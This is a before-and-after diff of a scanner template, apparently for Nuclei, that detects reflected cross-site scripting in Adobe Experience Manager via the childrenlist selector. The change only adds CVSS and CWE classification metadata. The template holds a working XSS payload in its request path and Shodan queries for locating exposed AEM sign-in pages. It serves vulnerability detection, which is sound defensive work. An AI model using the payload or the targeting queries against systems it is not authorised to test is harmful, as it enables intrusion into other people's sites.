misconfiguration/aem/aem-xss-childlist-selector.yaml (before)
id: aem-xss-childlist-selector

info:
  name: Adobe Experience Manager - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: |
    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
  reference:
    - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java
    - https://cystack.net/en/plugins/cystack.remote.aem_childlist_selector_xss
  metadata:
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: xss,aem,adobe

requests:
  - method: GET
    path:
      - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<svg onload=alert(document.domain)>'
          - '{"path":"/etc/designs/xh1x.childrenlist.json'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/14

misconfiguration/aem/aem-xss-childlist-selector.yaml (after)
id: aem-xss-childlist-selector

info:
  name: Adobe Experience Manager - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: |
    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
  reference:
    - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java
    - https://cystack.net/en/plugins/cystack.remote.aem_childlist_selector_xss
  metadata:
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,aem,adobe

requests:
  - method: GET
    path:
      - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<svg onload=alert(document.domain)>'
          - '{"path":"/etc/designs/xh1x.childrenlist.json'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/14

misconfiguration/aem/aem-xss-childlist-selector.yaml (diff)
@@ -13,6 +13,10 @@ info:
     shodan-query:
       - http.title:"AEM Sign In"
       - http.component:"Adobe Experience Manager"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,aem,adobe
 
 requests:
@@ -37,4 +41,4 @@ requests:
         status:
           - 200
 
-# Enhanced by md on 2022/09/14
+# Enhanced by mp on 2022/09/14
